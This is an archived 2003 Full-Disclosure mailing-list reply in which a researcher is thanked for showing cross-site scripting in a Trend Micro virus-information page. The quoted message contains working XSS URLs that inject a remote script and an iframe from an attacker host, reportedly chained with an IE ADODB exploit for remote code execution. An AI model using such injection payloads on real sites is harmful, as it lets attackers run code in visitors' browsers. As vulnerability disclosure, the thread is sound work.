lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: momolly at kryptocrew.de (Redaktion-Kryptocrew)
Subject: Selfmade worms in the wild ;)

hi Donnie,
thanks for your very fast privat & list reply - you're my man for xss ;)

regards
-mo-


m> well... lets see, we could make it an untrusted link by

m> "
m> http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
m> VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista
m> .com/backend/news.js"%20type="text/javascript"></script> "

m> and include some remote javascript of our choice, or the latest IE ADODB explot.
m> the obvious choice for that would be the classic..

m> http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
m> VName=WORM_MSBLAST.<iframe
m> src="http://some-evil-host/script/orhtml/etc/bla/"></iframe>

m> for everones info, the above was tested with the ADODB exploit to execute
m> remote code... sucessfully i might add. ( unpatched IE )

m> this goes to show that XSS is still very much a security concern, especially
m> coupled together with the lastest browser exploit to become a very dangerous
m> vector of attack, especially by way of a previously "trusted" URL.

m> this is not looking real good for trend.

m> good job Mo 8-)

m> morning_wood
m> http://exploitlabs.com
m> http://e2-labs.com

m> ----- Original Message -----
m> From: "Redaktion-Kryptocrew" <momolly@...ptocrew.de>
m> To: <full-disclosure@...ts.netsys.com>
m> Sent: Friday, August 29, 2003 12:02 AM
m> Subject: [Full-Disclosure] Selfmade worms in the wild ;)


>> You can change id's and names...
>> -mo-
>> Kryptocrew
>> .: your security advisor team :.           mailto:momolly@...ptocrew.de
>>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ